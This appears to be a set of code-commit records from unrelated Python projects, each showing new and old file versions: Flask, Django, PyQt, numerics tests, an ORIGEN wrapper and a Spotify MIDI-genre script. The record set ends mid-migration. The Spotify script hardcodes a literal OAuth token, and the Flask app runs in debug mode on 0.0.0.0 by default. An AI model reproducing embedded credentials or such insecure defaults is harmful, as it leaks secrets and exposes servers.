nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the results middle slice using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medostu` can also automaticaly crop the outputs to remove the largest possible
number of backgroud voxels. This makes outputted data significantly smaller.
`medostu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
| Python | 0.000016 |
51b716cc00efd0d0c93ffc11f4cd7242446bad88 | Remove unused pyrax import | nodes/management/commands/create_images.py | nodes/management/commands/create_images.py | from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger
class Command(BaseCommand):
    """Management command that rebuilds every node image under nodes/images.

    The 'raw' base image is built first (synchronously); every other image
    directory is then built concurrently on top of it via gevent greenlets.
    """
    help = 'create nodes images'
    def handle(self, *args, **kwargs):
        self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
        # Build the base image first; the remaining images derive from it.
        self._create_image('raw')
        tasks = [
            gevent.spawn(self._create_image, image, image_name='raw')
            for image in os.listdir(self._root) if image != 'raw'
        ]
        gevent.joinall(tasks)
    def _create_image(self, name, **kwargs):
        """Upload nodes/images/<name> to a fresh node, run its bootstrap.sh
        there, then snapshot the node as an image called <name>.

        kwargs are forwarded to connect_to_node (e.g. image_name='raw' to
        boot the node from the base image).
        """
        image_root = os.path.join(self._root, name)
        with connect_to_node(**kwargs) as node:
            node.put(image_root, '/root/{name}/'.format(name=name))
            out = node.execute('''
                cd /root/{name}/
                bash bootstrap.sh
            '''.format(name=name))
            logger.info(out.stdout)
            logger.info(out.stderr)
            node.save_image(name)
| from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger, pyrax
class Command(BaseCommand):
help = 'create nodes images'
def handle(self, *args, **kwargs):
self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
self._create_image('raw')
tasks = [
gevent.spawn(self._create_image, image, image_name='raw')
for image in os.listdir(self._root) if image != 'raw'
]
gevent.joinall(tasks)
def _create_image(self, name, **kwargs):
"""Create image"""
image_root = os.path.join(self._root, name)
with connect_to_node(**kwargs) as node:
node.put(image_root, '/root/{name}/'.format(name=name))
out = node.execute('''
cd /root/{name}/
bash bootstrap.sh
'''.format(name=name))
logger.info(out.stdout)
logger.info(out.stderr)
node.save_image(name)
| Python | 0 |
9ca88c5cd7f52c6f064a1d5edb003471f6223a74 | Change lable on click | Winston.py | Winston.py | import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
    """Main Winston window.

    Shows a greeting label and a single Alexa toggle button.  Every press,
    release and click is forwarded to the global messenger bus as a
    UI_BTN_* event so other components (e.g. the Alexa service) can react.
    """
    def __init__(self):
        # BUGFIX: super() must name the *derived* class.  The previous
        # super(QWidget, self).__init__() started after QWidget in QTApp's
        # MRO and therefore skipped QWidget's own initialisation.
        super(QTApp, self).__init__()
        self.title = 'Winston'
        self.setWindowTitle(self.title)
        self.setGeometry(100, 100, 800, 400)
        self.btn = QPushButton('', self)
        self.alexaService = AlexaService()
        self.messenger = getMessenger()
        self.initUI()
    def initUI(self):
        """Lay out the label and the Alexa button and wire up its signals."""
        self.label = QLabel(self)
        self.label.setText("Hi, I am Winston. How can I help you?")
        self.label.move(50, 40)
        self.btn.setCheckable(True)
        self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
        self.btn.setIconSize(QSize(150, 150))
        self.btn.setObjectName("Alexa")
        self.btn.move(100, 70)
        self.btn.pressed.connect(self.on_press)
        self.btn.released.connect(self.on_release)
        self.btn.clicked.connect(self.on_click)
        self.bool = False  # True while the 'listening ...' prompt is shown
        self.show()
    @pyqtSlot()
    def on_click(self):
        """Toggle the label between listening mode and the idle greeting."""
        sending_button = self.sender()
        # TODO
        if not self.bool:
            self.label.setText('listening ...')
            self.bool = True
        else:
            self.label.setText("Hi, I am Winston. How can I help you?")
            self.bool = False
        data = {'App': str(sending_button.objectName())}
        self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
    @pyqtSlot()
    def on_press(self):
        """Show the active icon while the button is held down."""
        sending_button = self.sender()
        data = {'App': str(sending_button.objectName())}
        self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
        self.btn.setCheckable(False)
        self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
    @pyqtSlot()
    def on_release(self):
        """Restore the passive icon when the button is released."""
        sending_button = self.sender()
        data = {'App': str(sending_button.objectName())}
        self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
        self.btn.setCheckable(True)
        self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
    # Build the Qt application and main window, run the event loop until the
    # window closes, then release the global messenger singleton and exit.
    app = QApplication(sys.argv)
    ex = QTApp()
    app.exec_()
    delMessenger()
    sys.exit()
| import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.title = 'Winston'
self.setWindowTitle(self.title)
self.setGeometry(100,100,800,400)
self.btn = QPushButton('', self)
self.alexaService = AlexaService()
self.messenger = getMessenger()
self.initUI()
def initUI(self):
b = QLabel(self)
b.setText("Hi, I am Winston. How can I help you?")
b.move(50,40)
self.btn.setCheckable(True)
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setIconSize(QSize(150,150))
self.btn.setObjectName("Alexa")
self.btn.move(100,70)
self.btn.pressed.connect(self.on_press)
self.btn.released.connect(self.on_release)
self.btn.clicked.connect(self.on_click)
self.show()
@pyqtSlot()
def on_click(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
@pyqtSlot()
def on_press(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
self.btn.setCheckable(False);
self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
@pyqtSlot()
def on_release(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setCheckable(True);
self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = QTApp()
app.exec_()
delMessenger()
sys.exit()
| Python | 0 |
2f31a1f0745214c2b06dadc1258926f7440d429f | Set datetime output format to ISO8601 | abe/app.py | abe/app.py | #!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
from flask_sslify import SSLify # redirect to https
from flask.json import JSONEncoder
from datetime import datetime
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.isoformat()
else:
return JSONEncoder.default(self, obj)
app.json_encoder = CustomJSONEncoder
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
| #!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
from flask_sslify import SSLify # redirect to https
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
| Python | 0.999999 |
ba1494afb962fb8fba84e306cfb4c26a83602b6d | update license | drink.py | drink.py | # -*- coding: utf-8 -*-
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
| # -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Chuck Housley
This work is free. You can redistribute it and/or modify it under the
terms of the Do What The Fuck You Want To Public License, Version 2,
as published by Sam Hocevar. See the COPYING file for more details.
"""
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
| Python | 0 |
6b56ab963f46ac45caf0a2f3391fdedf9dfabb39 | Fix python2 compatibility | create_dataset.py | create_dataset.py | from __future__ import print_function
import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"), protocol=2)
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
| import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"))
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
| Python | 0.000303 |
1b726978e1604269c8c4d2728a6f7ce774e5d16d | Fix edit control assessment modal | src/ggrc/models/control_assessment.py | src/ggrc/models/control_assessment.py | # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
audit = {} # we add this for the sake of client side error checking
# REST properties
_publish_attrs = [
'design',
'operationally',
'control',
PublishOnly('audit')
]
track_state_for_class(ControlAssessment)
| # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
# REST properties
_publish_attrs = [
'design',
'operationally',
'control'
]
track_state_for_class(ControlAssessment)
| Python | 0 |
e7d9a67611b2dc443c1f2bc23506323837d79bda | fix test_mcp | numerics/swig/tests/test_mcp.py | numerics/swig/tests/test_mcp.py | # Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function(z):
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return np.dot(M,z) + q
def mcp_Nablafunction(z):
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1, 1, mcp_function, mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
print("z = ", z)
print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
| # Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function (z) :
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return dot(M,z) + q
def mcp_Nablafunction (z) :
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
#print("z = ", z)
#print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
| Python | 0.00002 |
2fbdd9903fc9bf6e1fe797e92c0157abd67850ce | add robust tests for exec_command() | numpy/distutils/tests/test_exec_command.py | numpy/distutils/tests/test_exec_command.py | import os
import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
class redirect_stderr(object):
"""Context manager to redirect stderr for exec_command test."""
def __init__(self, stderr=None):
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stderr = sys.stderr
sys.stderr = self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stderr.flush()
sys.stderr = self.old_stderr
class emulate_nonposix(object):
"""Context manager to emulate os.name != 'posix' """
def __init__(self, osname='non-posix'):
self._new_name = osname
def __enter__(self):
self._old_name = os.name
os.name = self._new_name
def __exit__(self, exc_type, exc_value, traceback):
os.name = self._old_name
def test_exec_command_stdout():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
# Test posix version:
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
# Test non-posix version:
with emulate_nonposix():
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
def test_exec_command_stderr():
# Test posix version:
with redirect_stderr(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
# Test non-posix version:
# Note: this test reveals a failure
#with emulate_nonposix():
# with redirect_stderr(StringIO.StringIO()):
# exec_command.exec_command("cd '.'")
| import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
def test_exec_command():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
| Python | 0.000001 |
7138cd2fb7a5dc8a5044f15b19d3d53a1486dec3 | order by companies by name, helps when viewing adding companies to jobs entry form | companies/models.py | companies/models.py | from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from markupfield.fields import MarkupField
from cms.models import NameSlugModel
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class Company(NameSlugModel):
about = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
contact = models.CharField(null=True, blank=True, max_length=100)
email = models.EmailField(null=True, blank=True)
url = models.URLField('URL', null=True, blank=True)
logo = models.ImageField(upload_to='companies/logos/', blank=True, null=True)
class Meta:
verbose_name = _('company')
verbose_name_plural = _('companies')
ordering = ('name', )
| from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from markupfield.fields import MarkupField
from cms.models import NameSlugModel
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class Company(NameSlugModel):
about = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
contact = models.CharField(null=True, blank=True, max_length=100)
email = models.EmailField(null=True, blank=True)
url = models.URLField('URL', null=True, blank=True)
logo = models.ImageField(upload_to='companies/logos/', blank=True, null=True)
class Meta:
verbose_name = _('company')
verbose_name_plural = _('companies')
| Python | 0 |
f283dc1f710c8eca452d39f63f5b3b956e5676c8 | Fix the xs-tape9 option | transmutagen/origen.py | transmutagen/origen.py | import argparse
import os
from subprocess import run
from pyne.utils import toggle_warnings
import warnings
toggle_warnings()
warnings.simplefilter('ignore')
from pyne.origen22 import (nlbs, write_tape5_irradiation, write_tape4,
parse_tape9, merge_tape9, write_tape9, parse_tape6)
from pyne.material import from_atom_frac
ORIGEN = '/home/origen22/code/o2_therm_linux.exe'
decay_TAPE9 = "/home/origen22/libs/decay.lib"
LIBS_DIR = "/home/origen22/libs"
def make_parser():
p = argparse.ArgumentParser('origen', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('xs_tape9', metavar='xs-tape9', help="""path to the cross section TAPE9 file. If
the path is not absolute, defaults to looking in {LIBS_DIR}""".format(LIBS_DIR=LIBS_DIR))
p.add_argument('time', help='the time in sec',
type=float)
p.add_argument('--phi', help='the neutron flux in [n/cm^2/sec]',
type=float, default=4e14)
p.add_argument('--decay-tape9', help="path to the decay TAPE9 file.",
default=decay_TAPE9)
p.add_argument('--origen', help="Path to the origen executable",
default=ORIGEN)
return p
def main():
p = make_parser()
try:
import argcomplete
argcomplete.autocomplete(p)
except ImportError:
pass
args = p.parse_args()
xs_tape9 = args.xs_tape9
if not os.path.isabs(xs_tape9):
xs_tape9 = os.path.join(LIBS_DIR, xs_tape9)
time = args.time
phi = args.phi
decay_tape9 = args.decay_tape9
origen = args.origen
parsed_xs_tape9 = parse_tape9(xs_tape9)
parsed_decay_tape9 = parse_tape9(decay_tape9)
merged_tape9 = merge_tape9([parsed_decay_tape9, parsed_xs_tape9])
# Can set outfile to change directory, but the file name needs to be
# TAPE9.INP.
write_tape9(merged_tape9)
decay_nlb, xsfpy_nlb = nlbs(parsed_xs_tape9)
# Can set outfile, but the file name should be called TAPE5.INP.
write_tape5_irradiation("IRF", time/(60*60*24), phi,
xsfpy_nlb=xsfpy_nlb, cut_off=0, out_table_num=[4],
out_table_nes=[True, False, False])
M = from_atom_frac({"U235": 1}, mass=1, atoms_per_molecule=1)
write_tape4(M)
run(origen)
data = parse_tape6()
print(data)
filename = "{library} {time} {phi}.py".format(
library=os.path.basename(xs_tape9),
time=time,
phi=phi,
)
with open('/data/' + filename, 'w') as f:
f.write(repr(data))
print("Writing data to data/" + filename)
if __name__ == '__main__':
main()
| import argparse
import os
from subprocess import run
from pyne.utils import toggle_warnings
import warnings
toggle_warnings()
warnings.simplefilter('ignore')
from pyne.origen22 import (nlbs, write_tape5_irradiation, write_tape4,
parse_tape9, merge_tape9, write_tape9, parse_tape6)
from pyne.material import from_atom_frac
ORIGEN = '/home/origen22/code/o2_therm_linux.exe'
decay_TAPE9 = "/home/origen22/libs/decay.lib"
LIBS_DIR = "/home/origen22/libs"
def make_parser():
p = argparse.ArgumentParser('origen', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('xs-tape9', dest='xs_tape9', help="""path to the cross section TAPE9 file. If
the path is not absolute, defaults to looking in {LIBS_DIR}""".format(LIBS_DIR=LIBS_DIR))
p.add_argument('time', help='the time in sec',
type=float)
p.add_argument('--phi', help='the neutron flux in [n/cm^2/sec]',
type=float, default=4e14)
p.add_argument('--decay-tape9', help="path to the decay TAPE9 file.",
default=decay_TAPE9)
p.add_argument('--origen', help="Path to the origen executable",
default=ORIGEN)
return p
def main():
p = make_parser()
try:
import argcomplete
argcomplete.autocomplete(p)
except ImportError:
pass
args = p.parse_args()
xs_tape9 = args.xs_tape9
if not os.path.isabs(xs_tape9):
xs_tape9 = os.path.join(LIBS_DIR, xs_tape9)
time = args.time
phi = args.phi
decay_tape9 = args.decay_tape9
origen = args.origen
parsed_xs_tape9 = parse_tape9(xs_tape9)
parsed_decay_tape9 = parse_tape9(decay_tape9)
merged_tape9 = merge_tape9([parsed_decay_tape9, parsed_xs_tape9])
# Can set outfile to change directory, but the file name needs to be
# TAPE9.INP.
write_tape9(merged_tape9)
decay_nlb, xsfpy_nlb = nlbs(parsed_xs_tape9)
# Can set outfile, but the file name should be called TAPE5.INP.
write_tape5_irradiation("IRF", time/(60*60*24), phi,
xsfpy_nlb=xsfpy_nlb, cut_off=0, out_table_num=[4],
out_table_nes=[True, False, False])
M = from_atom_frac({"U235": 1}, mass=1, atoms_per_molecule=1)
write_tape4(M)
run(origen)
data = parse_tape6()
print(data)
filename = "{library} {time} {phi}.py".format(
library=os.path.basename(xs_tape9),
time=time,
phi=phi,
)
with open('/data/' + filename, 'w') as f:
f.write(repr(data))
print("Writing data to data/" + filename)
if __name__ == '__main__':
main()
| Python | 0.999998 |
10e7388eec8d16f5a69e5d4f3b9e6cf56a1c956e | Remove explicit byte string from migration 0003 (#298) | silk/migrations/0003_request_prof_file.py | silk/migrations/0003_request_prof_file.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 18:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('silk', '0002_auto_update_uuid4_id_field'),
]
operations = [
migrations.AddField(
model_name='request',
name='prof_file',
field=models.FileField(null=True, upload_to=''),
),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 18:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('silk', '0002_auto_update_uuid4_id_field'),
]
operations = [
migrations.AddField(
model_name='request',
name='prof_file',
